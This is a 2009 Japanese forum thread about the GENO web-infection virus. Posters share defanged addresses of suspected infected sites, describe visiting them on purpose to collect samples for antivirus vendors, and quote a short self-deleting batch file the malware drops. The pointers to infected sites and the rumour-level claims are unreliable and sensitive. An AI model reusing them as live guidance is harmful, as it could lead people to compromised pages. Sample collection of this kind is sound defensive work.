URL踏むのが怖いからどうのこうのって、単にURLにスペース入れるなりサイト名だけにするなりすれば良いのにさ
URL踏むのが怖いからどうのこうのって、単にURLにスペース入れるなりサイト名だけにするなりすれば良いのにさ
今気付いた事だけど、ウィンドウズモバイルだから感染しないって訳じゃないと思うから、怪しいサイトをスマートフォン等で踏んだら母艦PCと同期しない方が良いと思う。
人柱報告をここのスレと同人、VIPにマルチで書いたけどセキュリティ板には書かなかった・・・
やっぱ書いたほうがいいかな?
人柱報告をここのスレと同人、VIPにマルチで書いたけどセキュリティ板には書かなかった・・・
やっぱ書いたほうがいいかな?
>>650
さっそくやってみたけど結果は変わらなかった。
「みつけられなかったけど油断しないでください」
うちのXPは感染濃厚だけど
昼間仕事なんで今日の夜までは再インスコできないから
試作のVer.UPするならやってみるよ
さっそくやってみたけど結果は変わらなかった。
「みつけられなかったけど油断しないでください」
うちのXPは感染濃厚だけど
昼間仕事なんで今日の夜までは再インスコできないから
試作のVer.UPするならやってみるよ
659 :192.168.0.774:2009/05/18(月) 05:39:18 ID:uebw+uxF0
660 :192.168.0.774:2009/05/18(月) 05:41:30 ID:xKJ07MeN0
>>657
VIPってまともに機能してんの?
VIPってまともに機能してんの?
662 :192.168.0.774:2009/05/18(月) 05:44:04 ID:FWzOpsLD0
>>650
変わらなかったです。踏んでみたのはこれ
http://anubis.iseclab.org/?action=result&task_id=1409fed0e5bf88914a59ef2a0fe4f869e&format=html
変わらなかったです。踏んでみたのはこれ
http://anubis.iseclab.org/?action=result&task_id=1409fed0e5bf88914a59ef2a0fe4f869e&format=html
663 :192.168.0.774:2009/05/18(月) 05:45:47 ID:PGXf1oVHO
>>655
もちろん怖いからケータイで探すよ
感染してるサイトがあれば他のサイトと比較して違いが出るかもしれないしー
あとはサイトとかで拍手レスや日記を見て
更新が途絶えてるサイトが怪しいかなーとかね
夏コミが近くなると、そういうのを毎日更新するサイトが結構あるんだなー
駄目かな、こんな捜索の仕方じゃ。
もちろん怖いからケータイで探すよ
感染してるサイトがあれば他のサイトと比較して違いが出るかもしれないしー
あとはサイトとかで拍手レスや日記を見て
更新が途絶えてるサイトが怪しいかなーとかね
夏コミが近くなると、そういうのを毎日更新するサイトが結構あるんだなー
駄目かな、こんな捜索の仕方じゃ。
664 :192.168.0.774:2009/05/18(月) 05:46:27 ID:k2CI1leb0
とうとうPHPにbase64エンコードしてincludeするようになってしまったのか。
これは面倒だな。
これは面倒だな。
665 :192.168.0.774:2009/05/18(月) 05:46:35 ID:/bqCRjF50
666 :192.168.0.774:2009/05/18(月) 05:46:43 ID:FWzOpsLD0
:zC
dEl "C:\test\sample.exe"
iF EXIst "C:\test\sample.exe" goTO zC
dEL "C:\DOCUME~1\User\LOCALS~1\Temp\\e.bat"
実行したとき作られるe.batの中身はこんな感じ、ファイルを削除してる
dEl "C:\test\sample.exe"
iF EXIst "C:\test\sample.exe" goTO zC
dEL "C:\DOCUME~1\User\LOCALS~1\Temp\\e.bat"
実行したとき作られるe.batの中身はこんな感じ、ファイルを削除してる
667 :192.168.0.774:2009/05/18(月) 05:46:49 ID:2ybyztFx0
668 :192.168.0.774:2009/05/18(月) 05:48:24 ID:uebw+uxF0
>>661
ありがとう
ありがとう
669 :192.168.0.774:2009/05/18(月) 05:55:00 ID:GfBjvcuO0
670 :192.168.0.774:2009/05/18(月) 05:55:04 ID:PGXf1oVHO
ところでGoogleは感染してるのかな
671 :192.168.0.774:2009/05/18(月) 05:57:18 ID:/KUiF8zn0
>>670
してたら新聞載る
してたら新聞載る
672 :192.168.0.774:2009/05/18(月) 05:58:33 ID:k2CI1leb0
673 :192.168.0.774:2009/05/18(月) 05:58:55 ID:wcAYThWMO
>>670
火狐の先読み機能云々と混同してないか?
火狐の先読み機能云々と混同してないか?
674 :192.168.0.774:2009/05/18(月) 06:00:13 ID:2ybyztFx0
>>669
974 名前:GENO 投稿日:2009/05/18(月) 05:48:53 ID:EASrZNYM0
>>970
今回のウイルスの広がりかたはおかしいし人為的かもとか
そもそも存在してるのか?なんて言われてるくらいよく分からないウイルスなのに
サイト晒すのはなあ…
感染した本人がアドレス晒すのは全然構わないと思いますが
いまだに、こんな事言ってるような連中だから。究極の保身体質だ。
感染拡大防止より、自分達の世界の方が大事なんだろ。そんな事では、下手すると自滅するのにね。
974 名前:GENO 投稿日:2009/05/18(月) 05:48:53 ID:EASrZNYM0
>>970
今回のウイルスの広がりかたはおかしいし人為的かもとか
そもそも存在してるのか?なんて言われてるくらいよく分からないウイルスなのに
サイト晒すのはなあ…
感染した本人がアドレス晒すのは全然構わないと思いますが
いまだに、こんな事言ってるような連中だから。究極の保身体質だ。
感染拡大防止より、自分達の世界の方が大事なんだろ。そんな事では、下手すると自滅するのにね。
675 :192.168.0.774:2009/05/18(月) 06:01:36 ID:GfBjvcuO0
存在してるのか?にお茶吹いた
676 :192.168.0.774:2009/05/18(月) 06:02:14 ID:PGXf1oVHO
なるほど、サンクスです。
677 :192.168.0.774:2009/05/18(月) 06:02:20 ID:4oFiJRbxO
678 :192.168.0.774:2009/05/18(月) 06:03:25 ID:xKJ07MeN0
>>674
もうほっといてやれよ
もうほっといてやれよ
今うこっけいと小林製薬をスマートフォンで見てきた。
IE、オペラ共問題なし
あと感染していると思われるサイトを教えてほしいんだが、ここにURL直貼りじゃなくて、@を「あっと」に変える感じで書き込んでくれるとありがたい。
(直貼りすると踏む人が出て被害拡大するため)
とりあえず5つくらいサイト回って検証を終わりにしたいと思うので協力お願いします。
ちなみに携帯スペックは
イーモバイル
S21HT (HTC製)
ウィンドウズモバイル6.1
IEモバイルとオペラミニ9.5でトップページのみ踏む
ブラウザのオプションはデフォ
IE、オペラ共問題なし
あと感染していると思われるサイトを教えてほしいんだが、ここにURL直貼りじゃなくて、@を「あっと」に変える感じで書き込んでくれるとありがたい。
(直貼りすると踏む人が出て被害拡大するため)
とりあえず5つくらいサイト回って検証を終わりにしたいと思うので協力お願いします。
ちなみに携帯スペックは
イーモバイル
S21HT (HTC製)
ウィンドウズモバイル6.1
IEモバイルとオペラミニ9.5でトップページのみ踏む
ブラウザのオプションはデフォ
680 :192.168.0.774:2009/05/18(月) 06:08:44 ID:tFgIi2z+0
681 :192.168.0.774:2009/05/18(月) 06:11:03 ID:2ybyztFx0
682 :192.168.0.774:2009/05/18(月) 06:11:07 ID:PGXf1oVHO
683 :192.168.0.774:2009/05/18(月) 06:11:49 ID:f1LWJiL00
http:// 抜きでもリンクします
wwwを全角では?
wwwを全角では?
685 :192.168.0.774:2009/05/18(月) 06:13:42 ID:uebw+uxF0
. を、どっと と平仮名でかけばいいんじゃないか?
686 :192.168.0.774:2009/05/18(月) 06:19:13 ID:5ta7ziYM0
.を。にするとかで対応すればいいと思う
www以降でも専ブラだとリンクしちゃうし
www以降でも専ブラだとリンクしちゃうし
687 :192.168.0.774:2009/05/18(月) 06:20:00 ID:JmCcr4Q60
URLはピリオドを■辺りに変換して貼り付けるのが安全かねぇ?
とりあえず補完されにくい文字に置き換え推奨っつーことで
とりあえず補完されにくい文字に置き換え推奨っつーことで
688 :192.168.0.774:2009/05/18(月) 06:20:14 ID:tFgIi2z+0
689 :192.168.0.774:2009/05/18(月) 06:25:16 ID:PGXf1oVHO
GENOウイルスに感染してしまった方々のミクシィ日記
ttp://m.mixi.jp/view_diary.pl?id=1168739728&owner_id=119561&
ttp://m.mixi.jp/view_diary.pl?id=1170088443&owner_id=18777470&
ttp://m.mixi.jp/view_diary.pl?id=1168739728&owner_id=119561&
ttp://m.mixi.jp/view_diary.pl?id=1170088443&owner_id=18777470&
690 :192.168.0.774:2009/05/18(月) 06:26:54 ID:L4YY5vy4O
こうは?
www●ribbonmagic●com
www●ribbonmagic●com
>>690
分かればOKです。
ちなみに携帯では大丈夫でした。
そのサイト同人板のGENOスレにリダイレクトURL貼られててPCで踏んじゃったんだけど何故かGoogleに止められてAvast!先生は無反応だったw
火狐で設定そのままだったんだけどマジびびった
分かればOKです。
ちなみに携帯では大丈夫でした。
そのサイト同人板のGENOスレにリダイレクトURL貼られててPCで踏んじゃったんだけど何故かGoogleに止められてAvast!先生は無反応だったw
火狐で設定そのままだったんだけどマジびびった
692 :192.168.0.774:2009/05/18(月) 06:47:48 ID:AnkkIdnX0
また落ちてくるexeのハッシュ値変わった
693 :192.168.0.774:2009/05/18(月) 07:01:57 ID:l7w010Wk0
>>691
今の所は大丈夫っぽい。
怪しい記述は見つからないな。
http://www.dan.co.uk/viewsource/index.php?url=http%3A%2F%2Fwww.ribbonmagic.com
今の所は大丈夫っぽい。
怪しい記述は見つからないな。
http://www.dan.co.uk/viewsource/index.php?url=http%3A%2F%2Fwww.ribbonmagic.com
694 :192.168.0.774:2009/05/18(月) 07:12:50 ID:mLA05Iwx0
GENOスレ巡回してたら朝になってた。。。
というわけでしばらく仮眠とります。
検証は起きてからやります
というわけでしばらく仮眠とります。
検証は起きてからやります
695 :192.168.0.774:2009/05/18(月) 07:13:58 ID:I1cI3dKE0
悪徳商法マニアックスのサイトもやばい
696 :192.168.0.774:2009/05/18(月) 07:14:54 ID:zJTySDnN0
>>694
乙むりすんな
乙むりすんな
697 :192.168.0.774:2009/05/18(月) 07:18:00 ID:4ySopLDi0
>>691 グーグル先生は何か警告出るしな。ヤフー先生はどうかな
698 :ひみつの文字列さん:2024/04/28(日) 12:36:55 ID:MarkedRes
日本国またはアメリカ合衆国、もしくはその両方の著作権法に触れる内容であると疑われることから表示できません。
699 :192.168.0.774:2009/05/18(月) 07:24:45 ID:++caYdHRO
700 :192.168.0.774:2009/05/18(月) 07:28:20 ID:qoS+NLbF0
701 :192.168.0.774:2009/05/18(月) 07:29:06 ID:oK6yyyPI0
コメントアウトされてるから大丈夫だと思うけど気持ち悪いなw
コードには反応するかも
コードには反応するかも
702 :192.168.0.774:2009/05/18(月) 07:31:37 ID:xiraJ4z90
avast!でスキャンしたら一個検出した
googleでukokkei.co.jpを検索した時の火狐のキャッシュらしい
googleでukokkei.co.jpを検索した時の火狐のキャッシュらしい
703 :192.168.0.774:2009/05/18(月) 07:32:23 ID:k2CI1leb0
>>699
</HEAD>の直後にいるね。なんで残してるんだか。
</HEAD>の直後にいるね。なんで残してるんだか。
704 :192.168.0.774:2009/05/18(月) 07:34:42 ID:4ySopLDi0
>>702 ”ukokkei.co.jp”でググったら俺もavast反応した。キャッシュだったけど。消したほうがいいな
705 :192.168.0.774:2009/05/18(月) 07:36:05 ID:zpCoVVcL0
706 : ◆f/iQdjPxCM :2009/05/18(月) 07:36:39 ID:76hdi/6T0
707 :192.168.0.774:2009/05/18(月) 07:38:06 ID:+SS0hjWTO
初音ミクとかボーカロイドの同人が物凄い数感染してるっていうのは?
708 :192.168.0.774:2009/05/18(月) 07:40:45 ID:/4TBD5OI0
>>702
取り合えず無防備アタックしてみた
開いてるあいだCPU使用率が100%になった
けどC:\WINDOWS\system32\sqlsodbc.chmのファイルサイズに
変更は無いからGENOではないみたいだな
取り合えず無防備アタックしてみた
開いてるあいだCPU使用率が100%になった
けどC:\WINDOWS\system32\sqlsodbc.chmのファイルサイズに
変更は無いからGENOではないみたいだな
709 :192.168.0.774:2009/05/18(月) 07:52:36 ID:4ySopLDi0
なぁavast!が反応するならもし踏んでもチェストにいれて削除できるんじゃないの
710 :192.168.0.774:2009/05/18(月) 07:56:48 ID:l7w010Wk0
711 :192.168.0.774:2009/05/18(月) 08:08:11 ID:yKeLT0rF0
おはよう
今度はレポートの人とは別でスレで感染サイト探し?
で検体集め?
ちと3行くらいでまとめてくれ。サイト探しとかなら協力できるかも
今度はレポートの人とは別でスレで感染サイト探し?
で検体集め?
ちと3行くらいでまとめてくれ。サイト探しとかなら協力できるかも
712 :192.168.0.774:2009/05/18(月) 08:10:11 ID:KPrwLMxK0
同人板の住人です。
沢山ご迷惑おかけしてもうしわけございません。
なんのお役にもたてませんが、同人サイトが多数登録
されている個人サーチというものがございます。
そこを探せば同人サイトが沢山みつかります。
複数のサーチを探すには、サーチエンジンのリンク集という
総合サーチを探せば便利です。
これくらいしか情報提供できません。
お役にたてなくて申し訳ございませんでした。
沢山ご迷惑おかけしてもうしわけございません。
なんのお役にもたてませんが、同人サイトが多数登録
されている個人サーチというものがございます。
そこを探せば同人サイトが沢山みつかります。
複数のサーチを探すには、サーチエンジンのリンク集という
総合サーチを探せば便利です。
これくらいしか情報提供できません。
お役にたてなくて申し訳ございませんでした。
713 :192.168.0.774:2009/05/18(月) 08:13:16 ID:OsK02Ge20
714 :192.168.0.774:2009/05/18(月) 08:19:01 ID:OFNjMzot0
715 :192.168.0.774:2009/05/18(月) 08:19:46 ID:4oFiJRbxO
このウイルスって携帯はセーフだそうだが、360とか、PSP、PS3は?アウト?セーフ?
716 :192.168.0.774:2009/05/18(月) 08:21:20 ID:iven4hyc0
【備えよ】 新型インフルエンザを語る part4
http://society6.2ch.net/test/read.cgi/hosp/1242525724/208,216
病院・医者板にあるURLにgenoウイルスに感染したサイトがある。
208 名前:卵の名無しさん[] 投稿日:2009/05/18(月) 01:12:10 ID:MtaDxdjC0 (PC)
なんかこの板にあったリンク先を見てから、PCの調子が悪いんだが。
DOSプロンプトが開かないとか、windowsアップデートが正常終了しないとか。
216 名前:卵の名無しさん[] 投稿日:2009/05/18(月) 01:40:12 ID:p8ujOdZK0 (PC)
>>208
もしかして小林製薬とか薬事日報社のページ見ませんでした?
それページ閲覧しただけで感染する"強毒性の新型ウィルス"ですよ。
かかったら今のところWin再インストールしかない恐ろしいウィルス。
ウィルス検査ソフトでも検出できないものが多いようです。
http://society6.2ch.net/test/read.cgi/hosp/1242525724/208,216
病院・医者板にあるURLにgenoウイルスに感染したサイトがある。
208 名前:卵の名無しさん[] 投稿日:2009/05/18(月) 01:12:10 ID:MtaDxdjC0 (PC)
なんかこの板にあったリンク先を見てから、PCの調子が悪いんだが。
DOSプロンプトが開かないとか、windowsアップデートが正常終了しないとか。
216 名前:卵の名無しさん[] 投稿日:2009/05/18(月) 01:40:12 ID:p8ujOdZK0 (PC)
>>208
もしかして小林製薬とか薬事日報社のページ見ませんでした?
それページ閲覧しただけで感染する"強毒性の新型ウィルス"ですよ。
かかったら今のところWin再インストールしかない恐ろしいウィルス。
ウィルス検査ソフトでも検出できないものが多いようです。
717 :192.168.0.774:2009/05/18(月) 08:25:19 ID:wWb/jJWH0
____
/_ノ ヽ、_\
ミ ミ ミ o゚((●)) ((●))゚o ミ ミ ミ
/⌒)⌒)⌒. ::::::⌒(__人__)⌒:::\ /⌒)⌒)⌒)
| / / / |r┬-| | (⌒)/ / / // 360とか、PSP、PS3だっておwwwwwwwwwwwwwwwwwww
| :::::::::::(⌒) | | | / ゝ :::::::::::/
| ノ | | | \ / ) /
ヽ / `ー'´ ヽ / / バ
| | l||l 从人 l||l l||l 从人 l||l バ ン
ヽ -一''''''"~~``'ー--、 -一'''''''ー-、 ン
ヽ ____(⌒)(⌒)⌒) ) (⌒_(⌒)⌒)⌒))
/_ノ ヽ、_\
ミ ミ ミ o゚((●)) ((●))゚o ミ ミ ミ
/⌒)⌒)⌒. ::::::⌒(__人__)⌒:::\ /⌒)⌒)⌒)
| / / / |r┬-| | (⌒)/ / / // 360とか、PSP、PS3だっておwwwwwwwwwwwwwwwwwww
| :::::::::::(⌒) | | | / ゝ :::::::::::/
| ノ | | | \ / ) /
ヽ / `ー'´ ヽ / / バ
| | l||l 从人 l||l l||l 从人 l||l バ ン
ヽ -一''''''"~~``'ー--、 -一'''''''ー-、 ン
ヽ ____(⌒)(⌒)⌒) ) (⌒_(⌒)⌒)⌒))
718 :192.168.0.774:2009/05/18(月) 08:26:20 ID:KPrwLMxK0
>>713
したらばなどで感染サイトを記する案もでたんですが、
どうにこうにも同人板は基本晒し厳禁なので協力者がいません。
同人独自のルールが根深くありまして、特に女性サイトは
以上に検索避けを行う風習があるくらいですから。
同人板のスレに検体を求める書き込みが多数ありましたが、
結局住人は荒らしだと決め付けてスルーに入りました。
感染が広がる同人ジャンルなのに、住人では何もしようとしません。
したらばなどで感染サイトを記する案もでたんですが、
どうにこうにも同人板は基本晒し厳禁なので協力者がいません。
同人独自のルールが根深くありまして、特に女性サイトは
以上に検索避けを行う風習があるくらいですから。
同人板のスレに検体を求める書き込みが多数ありましたが、
結局住人は荒らしだと決め付けてスルーに入りました。
感染が広がる同人ジャンルなのに、住人では何もしようとしません。
719 :192.168.0.774:2009/05/18(月) 08:26:59 ID:L4YY5vy4O
720 :192.168.0.774:2009/05/18(月) 08:29:32 ID:/4TBD5OI0
721 :192.168.0.774:2009/05/18(月) 08:30:18 ID:tFgIi2z+0
http://genolists.alink.uic.to/
一応やってみたよ
一応やってみたよ
722 :192.168.0.774:2009/05/18(月) 08:32:10 ID:xKJ07MeN0
723 :192.168.0.774:2009/05/18(月) 08:32:57 ID:yKeLT0rF0
724 :192.168.0.774:2009/05/18(月) 08:33:36 ID:c4TnzPSv0
誤爆でバレたかもしれないけどw
同人板住人です。
ジャンルの性質上、晒しに敏感なのはわかってたけど
あそこまで狭い範囲でしか考えられない人が揃ってるとは
正直思わなかった。
ご迷惑をおかけして申し訳ないです。
同人板住人です。
ジャンルの性質上、晒しに敏感なのはわかってたけど
あそこまで狭い範囲でしか考えられない人が揃ってるとは
正直思わなかった。
ご迷惑をおかけして申し訳ないです。
725 :192.168.0.774:2009/05/18(月) 08:34:25 ID:r4h+PdSAO
勝利宣言してる人は単発の荒らしでつよ!とかなんたら言い出しそうですね
ごもっともですが、いちいち書かずとも解るし
VIPにまとめスレ立てようとしましたが無理でしたので、
どなたかお願いします。
ごもっともですが、いちいち書かずとも解るし
VIPにまとめスレ立てようとしましたが無理でしたので、
どなたかお願いします。
726 :192.168.0.774:2009/05/18(月) 08:35:02 ID:yKeLT0rF0
>>722
協力したいけど他人のアドレス晒すなんて可哀相
本人から許可をとか言い出すと思う。本気で協力したいと思っててで
あと、なんだかんだいってたいして感染サイト知らないんだと思う
しかしいざ探そうとするとなかなか見つからん。
wikiのヒントだけが頼りだからなぁ
協力したいけど他人のアドレス晒すなんて可哀相
本人から許可をとか言い出すと思う。本気で協力したいと思っててで
あと、なんだかんだいってたいして感染サイト知らないんだと思う
しかしいざ探そうとするとなかなか見つからん。
wikiのヒントだけが頼りだからなぁ
727 :192.168.0.774:2009/05/18(月) 08:41:45 ID:ua7Ctj4Z0
感染してみたい人は、ここよりも、SEC板のGENOスレの方がいいんじゃないかなぁ。
見ててちょっとうざくなってきた。
見ててちょっとうざくなってきた。
728 :192.168.0.774:2009/05/18(月) 08:42:04 ID:Uvd5wKih0
729 :192.168.0.774:2009/05/18(月) 08:45:48 ID:BfwGP9yG0
730 :192.168.0.774:2009/05/18(月) 08:47:27 ID:yKeLT0rF0
>>721に感染サイト突っ込んでけば良いのかな?
既出分も入れるの?
既出分も入れるの?
731 :192.168.0.774:2009/05/18(月) 08:47:55 ID:zpCoVVcL0
>>721
乙です
これ、ウイルスの配布元がからっぽだから無害って話が出てたところも
登録していいの?
>>723
自意識過剰というよりは
実際に私怨晒しに使う馬鹿が同人板の中にいるからだな…
あと同人板は最近まで私怨ほかの晒しで揉めてたから
いつも以上にアレルギーが出てる
乙です
これ、ウイルスの配布元がからっぽだから無害って話が出てたところも
登録していいの?
>>723
自意識過剰というよりは
実際に私怨晒しに使う馬鹿が同人板の中にいるからだな…
あと同人板は最近まで私怨ほかの晒しで揉めてたから
いつも以上にアレルギーが出てる
732 :192.168.0.774:2009/05/18(月) 08:48:22 ID:tFgIi2z+0
>>731
ジャンル分けておくわ
ジャンル分けておくわ
733 :192.168.0.774:2009/05/18(月) 08:51:24 ID:yKeLT0rF0
734 :192.168.0.774:2009/05/18(月) 08:53:24 ID:7mu1Axnz0
4月の時点から参加してて、できるかぎり協力もしてるんだけど
この週末席を外してて、スレ乱立激しくてどれが主スレかわからんくなってきた。
今まではセキュ板だったんだけど、見てみて見限った。
現状はここが主スレと考えておk?
この週末席を外してて、スレ乱立激しくてどれが主スレかわからんくなってきた。
今まではセキュ板だったんだけど、見てみて見限った。
現状はここが主スレと考えておk?
735 :192.168.0.774:2009/05/18(月) 08:54:31 ID:NjPoBYuDO
同人板で聞いても誰も説明してくれなかったから敢えて聞くけど。
感染疑惑サイト集めて一覧にしてどうするんだ?
まとめにでも貼るのか?
2ch内だけであの辺感染してるから踏むなよって警告だけに使って意味あるのかとか
何がしたいか分からないのだが
感染疑惑サイト集めて一覧にしてどうするんだ?
まとめにでも貼るのか?
2ch内だけであの辺感染してるから踏むなよって警告だけに使って意味あるのかとか
何がしたいか分からないのだが
736 :192.168.0.774:2009/05/18(月) 08:55:31 ID:GfBjvcuO0
というか私怨はすぐ外されるから大丈夫じゃないの?
大体ウィルス感染自体は悪事でもなんでもないでしょう、その後の対応をきちっとやれば良いだけで
むしろしっかりしてるなとすら思われるんじゃないの?こういう感覚はおかしいの?同人的に
大体ウィルス感染自体は悪事でもなんでもないでしょう、その後の対応をきちっとやれば良いだけで
むしろしっかりしてるなとすら思われるんじゃないの?こういう感覚はおかしいの?同人的に
737 :192.168.0.774:2009/05/18(月) 08:56:01 ID:zpCoVVcL0
738 :192.168.0.774:2009/05/18(月) 08:57:37 ID:/yFIekht0
IE系のブラウザはJavaScript切ってるだけじゃ駄目なん?
739 :192.168.0.774:2009/05/18(月) 08:57:40 ID:liJyExVc0
限られた集団の中の警告だけでも十分意味はあると思う。
そもそもアンチウイルスソフトだって
購入者だけ守っているような物だもん。
そもそもアンチウイルスソフトだって
購入者だけ守っているような物だもん。
740 :ひみつの文字列さん:2024/04/28(日) 12:36:55 ID:MarkedRes
日本国またはアメリカ合衆国、もしくはその両方の著作権法に触れる内容であると疑われることから表示できません。
741 :192.168.0.774:2009/05/18(月) 09:04:57 ID:3Wf1BgQ0O
742 :192.168.0.774:2009/05/18(月) 09:05:49 ID:KP5/wRB70
検体探すのなら闇雲に同人サイト探すより名前変換サイト(夢/ドリーム)探すといいと思う。
性質上名前を変換するのにJS必須だから感染確立の高さは異常。
cluster■x0.to/search/(サーチエンジンのリンク集■= . )
辺りからカテゴリ→傾向→ドリームでいくつかサーチ出てくる。
性質上名前を変換するのにJS必須だから感染確立の高さは異常。
cluster■x0.to/search/(サーチエンジンのリンク集■= . )
辺りからカテゴリ→傾向→ドリームでいくつかサーチ出てくる。
743 :192.168.0.774:2009/05/18(月) 09:06:10 ID:bBtWfmBn0
>>736
同人界に生息するDQNや厨をなめちゃいけません
ウィルス流行ってるから気をつけてとサイトで告知→恐がらせるなんて、ひどい!
感染してないし、対策バッチリだから特に告知なし→何も対策してないなんてひどい!
感染していたが、ちゃんと対応した→危機管理がなってない、ひどい!
と突撃を受けるような場所だよ
とにかく同人板及び同人界は特殊な場所だと頭に叩き込んで、
あっちに僅かにいるまともな人かこっちにまできてるまともな人から情報を貰った方がいい
同人界に生息するDQNや厨をなめちゃいけません
ウィルス流行ってるから気をつけてとサイトで告知→恐がらせるなんて、ひどい!
感染してないし、対策バッチリだから特に告知なし→何も対策してないなんてひどい!
感染していたが、ちゃんと対応した→危機管理がなってない、ひどい!
と突撃を受けるような場所だよ
とにかく同人板及び同人界は特殊な場所だと頭に叩き込んで、
あっちに僅かにいるまともな人かこっちにまできてるまともな人から情報を貰った方がいい
744 :192.168.0.774:2009/05/18(月) 09:06:16 ID:vNF2317C0
>>734
セキュ板は見ての通りの状態だからIDの出る板へ引っ越しだね
セキュ板は見ての通りの状態だからIDの出る板へ引っ越しだね
745 :192.168.0.774:2009/05/18(月) 09:06:24 ID:EUa+NIiOO
URLを何のために晒すか、そのあとどうするのか
という説明一切なくただ晒せ晒せ言っても、同人板じゃなくても晒す奴いないと思うんだが……
ボーカロイドの大手、サーチ、歌ってみた系の同盟?
東方の大手(ひらがな4文字だか漢字2文字だか)
というのはどっかで見た
ジャンル者じゃないから詳細はわからないけど
という説明一切なくただ晒せ晒せ言っても、同人板じゃなくても晒す奴いないと思うんだが……
ボーカロイドの大手、サーチ、歌ってみた系の同盟?
東方の大手(ひらがな4文字だか漢字2文字だか)
というのはどっかで見た
ジャンル者じゃないから詳細はわからないけど
746 :192.168.0.774:2009/05/18(月) 09:07:19 ID:ImVScTUk0
747 :192.168.0.774:2009/05/18(月) 09:07:19 ID:k2CI1leb0
>>735
俺個人に関しては、個別に踏みに行って検体拾ってきて、ViruslTotalに上げてみて
検出されなければ検体を↓にアップ。
【鑑定目的禁止】検出可否報告スレ10
http://pc11.2ch.net/test/read.cgi/sec/1235459712/
と同時にできる範囲でセキュリティベンダーに検体を提出する。
また、踏みに行くことでスクリプトの変化状況もつかめるから、例えばVistaや
Chromeをターゲットにしてるのを見つけたらここに報告する。
俺個人に関しては、個別に踏みに行って検体拾ってきて、ViruslTotalに上げてみて
検出されなければ検体を↓にアップ。
【鑑定目的禁止】検出可否報告スレ10
http://pc11.2ch.net/test/read.cgi/sec/1235459712/
と同時にできる範囲でセキュリティベンダーに検体を提出する。
また、踏みに行くことでスクリプトの変化状況もつかめるから、例えばVistaや
Chromeをターゲットにしてるのを見つけたらここに報告する。
748 :192.168.0.774:2009/05/18(月) 09:07:36 ID:iven4hyc0
ニコニコにGENOウィルスについて
動画があって、内容か不正確だからうpした人間が
消してしまった。結構マイりスト再生数数あったな。
動画があって、内容か不正確だからうpした人間が
消してしまった。結構マイりスト再生数数あったな。
749 :192.168.0.774:2009/05/18(月) 09:07:56 ID:PjOToSNF0
はっはっはっ
同人者だけどもう耐えられないw 何この馬鹿
280 名前:GENO 本日のレス 投稿日:2009/05/18(月) 09:03:57 Osjp9Dvs0
>>274
評判最悪もなにも……
自分達の実験動物になってくれなかったから愚痴ってるだけじゃんw
恥を知れよ。お前も。
同人者だけどもう耐えられないw 何この馬鹿
280 名前:GENO 本日のレス 投稿日:2009/05/18(月) 09:03:57 Osjp9Dvs0
>>274
評判最悪もなにも……
自分達の実験動物になってくれなかったから愚痴ってるだけじゃんw
恥を知れよ。お前も。
750 :192.168.0.774:2009/05/18(月) 09:09:02 ID:c4TnzPSv0
751 :192.168.0.774:2009/05/18(月) 09:09:21 ID:SsnH/5OJP
ヲチでやれ
752 :192.168.0.774:2009/05/18(月) 09:09:23 ID:4ySopLDi0
>「キャッシュ消せばいいんだよ!」
って言うAAありますけど、消して良いのでしょうか
って言うAAありますけど、消して良いのでしょうか
753 :192.168.0.774:2009/05/18(月) 09:10:10 ID:7mu1Axnz0
754 :192.168.0.774:2009/05/18(月) 09:10:18 ID:kqUxb44l0
毎日消せばいいんだよ
755 :192.168.0.774:2009/05/18(月) 09:10:54 ID:r4h+PdSAO
>>749さん、同人板からの出張乙でした。もうお前に用は無い
756 :192.168.0.774:2009/05/18(月) 09:11:48 ID:yKeLT0rF0
よっしゃあ。1個見っけた
ソースチェック中にブラウザ先読みでかキャッシュに入ってきてビビった
ソースチェック中にブラウザ先読みでかキャッシュに入ってきてビビった
757 :192.168.0.774:2009/05/18(月) 09:14:20 ID:qhPHQv7V0
>>735
2chにはROMというのが書き込みの数倍おってな…
またねらーが2chでしか活動しないわけでもなく、知識は広がる
GENOだって感染してるのにテキトーぶっこいて誤魔化したから、
知らずにアクセスする人が出て感染拡大してこの有様なんだろ。
よくわからん感染してない層が今後感染する確率を減らすためにも、
感染してる危険な状態のサイトを知る機会を作ることは充分に意味があると思う。
2chにはROMというのが書き込みの数倍おってな…
またねらーが2chでしか活動しないわけでもなく、知識は広がる
GENOだって感染してるのにテキトーぶっこいて誤魔化したから、
知らずにアクセスする人が出て感染拡大してこの有様なんだろ。
よくわからん感染してない層が今後感染する確率を減らすためにも、
感染してる危険な状態のサイトを知る機会を作ることは充分に意味があると思う。
758 :192.168.0.774:2009/05/18(月) 09:14:29 ID:NjPoBYuDO
747の言う事はある程度納得。
そういう具体的な説明されれば動く奴は動くと思う。
正直同人板ではこの質問オールスルーだったから荒し認定も仕方なかった
そういう具体的な説明されれば動く奴は動くと思う。
正直同人板ではこの質問オールスルーだったから荒し認定も仕方なかった
759 :192.168.0.774:2009/05/18(月) 09:16:48 ID:lbjdJxFz0
本家 F-Secure SAS 提出分の回答 現在のところなし。
定義ファイルも昨日から変更なし。
定義ファイルも昨日から変更なし。
760 :192.168.0.774:2009/05/18(月) 09:21:08 ID:2hjuGSUk0
761 :192.168.0.774:2009/05/18(月) 09:22:08 ID:k2CI1leb0
762 :192.168.0.774:2009/05/18(月) 09:22:35 ID:0cCnuNjQP
>>760
同人板のノリをこっちに持ち込むなよタコ
同人板のノリをこっちに持ち込むなよタコ
763 :192.168.0.774:2009/05/18(月) 09:22:40 ID:yKeLT0rF0
で>>721のリンク集は使うの?
やっと1個見つけれたんだが
やっと1個見つけれたんだが
764 :192.168.0.774:2009/05/18(月) 09:23:36 ID:EUa+NIiOO
>>750
そうなのかそれはすまん
素人を理由にするなと言われるだろうが
自分も含め 知識のない人にとっては ただ晒せと言われたってわからないんだ
何に使うか説明されずに「いいから署名しろ」って言われてる感じ
何故晒す必要があるのか晒してどうするかを具体的に言われたら同人板でも理解のあるやつはいると思う
解決に役立てたいと思っているなら尚更 わかりやすく向こうでそれを説明してほしい
長文になったごめん
そうなのかそれはすまん
素人を理由にするなと言われるだろうが
自分も含め 知識のない人にとっては ただ晒せと言われたってわからないんだ
何に使うか説明されずに「いいから署名しろ」って言われてる感じ
何故晒す必要があるのか晒してどうするかを具体的に言われたら同人板でも理解のあるやつはいると思う
解決に役立てたいと思っているなら尚更 わかりやすく向こうでそれを説明してほしい
長文になったごめん
765 :192.168.0.774:2009/05/18(月) 09:24:30 ID:7S654oYT0
>>764
もうここでのやりとりが貼られてるよ
もうここでのやりとりが貼られてるよ
766 :192.168.0.774:2009/05/18(月) 09:29:30 ID:kqUxb44l0
>>760
自業自得だろw
自業自得だろw
